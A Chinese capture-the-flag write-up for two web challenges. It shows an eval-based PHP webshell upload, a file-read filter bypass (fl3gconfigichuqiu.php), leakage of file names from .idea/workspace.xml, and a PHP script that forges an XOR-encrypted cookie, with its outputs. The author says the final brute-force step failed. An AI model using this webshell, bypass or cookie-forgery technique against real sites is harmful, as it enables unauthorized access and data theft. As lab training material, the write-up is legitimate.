Upload
可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话:
@eval($POST["code"]);
?>
结果发现
<script language&#61;"PHP">
$f&#61;fopen("../flag.".strtolower("PHP"),&#39;r&#39;);
echo fread($f,filesize("../flag.".strtolower("PHP")));
fclose($f);
</script>
查看源码&#xff0c;点击/u/x.php即可得到flag。
这里附上PHP四种标记风格链接https://blog.csdn.net/qq_35085863/article/details/76714367
code 考脑洞&#xff0c;你能过么&#xff1f;
题目打开是一张图片&#xff0c;http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/index.php?jpg&#61;hei.jpg
看url发现可能是文件包含&#xff0c;查看index.php:
http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/index.php?jpg&#61;index.php
查看源码&#xff0c;得到一串base64编码
<title>file:index.php</title><img src&#61;&#39;data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KaGVhZGVyKCdjb250ZW50LXR5cGU6dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgnKTsNCmlmKCEgaXNzZXQoJF9HRVRbJ2pwZyddKSkNCiAgICBoZWFkZXIoJ1JlZnJlc2g6MDt1cmw9Li9pbmRleC5waHA/anBnPWhlaS5qcGcnKTsNCiRmaWxlID0gJF9HRVRbJ2pwZyddOw0KZWNobyAnPHRpdGxlPmZpbGU6Jy4kZmlsZS4nPC90aXRsZT4nOw0KJGZpbGUgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOS5dKy8iLCIiLCAkZmlsZSk7DQokZmlsZSA9IHN0cl9yZXBsYWNlKCJjb25maWciLCJfIiwgJGZpbGUpOw0KJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsNCg0KZWNobyAiPGltZyBzcmM9J2RhdGE6aW1hZ2UvZ2lmO2Jhc2U2NCwiLiR0eHQuIic&#43;PC9pbWc&#43;IjsNCg0KLyoNCiAqIENhbiB5b3UgZmluZCB0aGUgZmxhZyBmaWxlPw0KICoNCiAqLw0KDQo/Pg&#61;&#61;&#39;></img>
解码之后&#xff0c;得到
header(&#39;content-type:text/html;charset&#61;utf-8&#39;);
if(! isset($_GET[&#39;jpg&#39;]))header(&#39;Refresh:0;url&#61;./index.php?jpg&#61;hei.jpg&#39;);
$file &#61; $_GET[&#39;jpg&#39;];
echo &#39;&#39;;
$file &#61; preg_replace("/[^a-zA-Z0-9.]&#43;/","", $file);
$file &#61; str_replace("config","_", $file);
$txt &#61; base64_encode(file_get_contents($file));echo ".$txt."&#39;>";?>
看了wp之后&#xff0c;phpstorm新建项目会生成.idea文件夹&#xff0c;打开里面有workspace.xml&#xff0c;访问一下http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/.idea/workspace.xml&#xff0c;查看源码&#xff0c;发现有点东西&#xff0c;
<option value&#61;"$PROJECT_DIR$/x.php" />
<option value&#61;"$PROJECT_DIR$/config.php" />
<option value&#61;"$PROJECT_DIR$/fl3g_ichuqiu.php" />
于是直接访问fl3g_ichuqiu.php&#xff0c;发现不行╮(╯▽╰)╭
那么还可以通过index.php来读文件&#xff08;访问index.php?jpg&#61;fl3g_ichuqiu.php
&#xff09;&#xff0c;但是不难发现过滤了大小写数字字符以外的其他字符&#xff0c;也就是说_被过滤了&#xff0c;但是又发现config会被替代成_也就可以绕过过滤了。所以payload&#xff1a;
/index.php?jpg&#61;fl3gconfigichuqiu.php
又是一串base64&#xff0c;转一下&#xff0c;得到源码&#xff1a;
error_reporting(E_ALL || ~E_NOTICE);
include(&#39;config.php&#39;);
function random($length, $chars &#61; &#39;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz&#39;) {$hash &#61; &#39;&#39;;$max &#61; strlen($chars) - 1;for($i &#61; 0; $i < $length; $i&#43;&#43;) {$hash .&#61; $chars[mt_rand(0, $max)];}return $hash;
}
function encrypt($txt,$key){for($i&#61;0;$i<strlen($txt);$i&#43;&#43;){$tmp .&#61; chr(ord($txt[$i])&#43;10); }$txt &#61; $tmp;$rnd&#61;random(4); $key&#61;md5($rnd.$key); $s&#61;0;for($i&#61;0;$i<strlen($txt);$i&#43;&#43;){if($s &#61;&#61; 32) $s &#61; 0;$ttmp .&#61; $txt[$i] ^ $key[&#43;&#43;$s]; }return base64_encode($rnd.$ttmp);
}
function decrypt($txt,$key){$txt&#61;base64_decode($txt);$rnd &#61; substr($txt,0,4); $txt &#61; substr($txt,4); $key&#61;md5($rnd.$key);$s&#61;0;for($i&#61;0;$i<strlen($txt);$i&#43;&#43;){if($s &#61;&#61; 32) $s &#61; 0;$tmp .&#61; $txt[$i]^$key[&#43;&#43;$s]; }for($i&#61;0;$i<strlen($tmp);$i&#43;&#43;){$tmp1 .&#61; chr(ord($tmp[$i])-10);}return $tmp1;
}
$username &#61; decrypt($_COOKIE[&#39;user&#39;],$key);
if ($username &#61;&#61; &#39;system&#39;){echo $flag;
}else{setCOOKIE(&#39;user&#39;,encrypt(&#39;guest&#39;,$key));echo "╮(╯▽╰)╭";
}
?>
看了PureT大佬的wp https://www.jianshu.com/p/3d7fb34c28a6
分析之后&#xff0c;flag应该是在config里。fl3g_ichuqiu.php文件接收COOKIE值解密之后如果等于system就输出flag&#xff0c;我们要做的就是研究加密算法怎么让fl3g_ichuqiu.php解密COOKIE中的username等于system。
破解这个加密算法的着手点就是我们已知guest加密后的结果。
先用burpsuite拦截数据包读取COOKIE然后运行脚本。
大佬大佬&#xff0c;PHP写了个脚本&#xff0c;佩服~~
error_reporting(E_ALL || ~E_NOTICE);$text &#61; &#39;guest&#39;;$COOKIE_guest &#61; &#39;dk9FS0hOXUhH&#39;; $COOKIE_guest &#61; base64_decode($COOKIE_guest);$rnd &#61; substr($COOKIE_guest,0,4); $COOKIE_guest &#61; substr($COOKIE_guest,4);for ($i &#61; 0; $i < strlen($text); $i&#43;&#43;) {$text[$i] &#61; chr(ord($text[$i])&#43;10);}for ($i &#61; 0; $i < strlen($text); $i&#43;&#43;) {$key .&#61; ($text[$i] ^ $COOKIE_guest[$i]);}$text2 &#61; &#39;system&#39;;for ($i &#61; 0; $i < strlen($text2); $i&#43;&#43;) {$text2[$i] &#61; chr(ord($text2[$i])&#43;10);}$t &#61; &#39;0123456789abcdef&#39;;for ($j &#61; 0; $j < strlen($t); $j&#43;&#43;) {$key_temp &#61; $key.$t[$j];$result &#61; &#39;&#39;;for ($i &#61; 0; $i < strlen($text2); $i&#43;&#43;) {$result .&#61; ($key_temp[$i] ^ $text2[$i]);}$result &#61; base64_encode($rnd.$result);echo $result."\n";}?>
在脚本中已经写好了所有六位的情况&#xff0c;运行脚本输出&#xff1a;
dk9FS0SyT0tWRw&#61;&#61;
dk9FS0SyT0tWRg&#61;&#61;
dk9FS0SyT0tWRQ&#61;&#61;
dk9FS0SyT0tWRA&#61;&#61;
dk9FS0SyT0tWQw&#61;&#61;
dk9FS0SyT0tWQg&#61;&#61;
dk9FS0SyT0tWQQ&#61;&#61;
dk9FS0SyT0tWQA&#61;&#61;
dk9FS0SyT0tWTw&#61;&#61;
dk9FS0SyT0tWTg&#61;&#61;
dk9FS0SyT0tWFg&#61;&#61;
dk9FS0SyT0tWFQ&#61;&#61;
dk9FS0SyT0tWFA&#61;&#61;
dk9FS0SyT0tWEw&#61;&#61;
dk9FS0SyT0tWEg&#61;&#61;
dk9FS0SyT0tWEQ&#61;&#61;
guest5位而system6位&#xff0c;还有最后1位需要我们爆破&#xff0c;把上面的载入到bp爆破&#xff0c;理论上是这样&#xff0c;但是就是爆不出来&#xff0c;┭┮﹏┭┮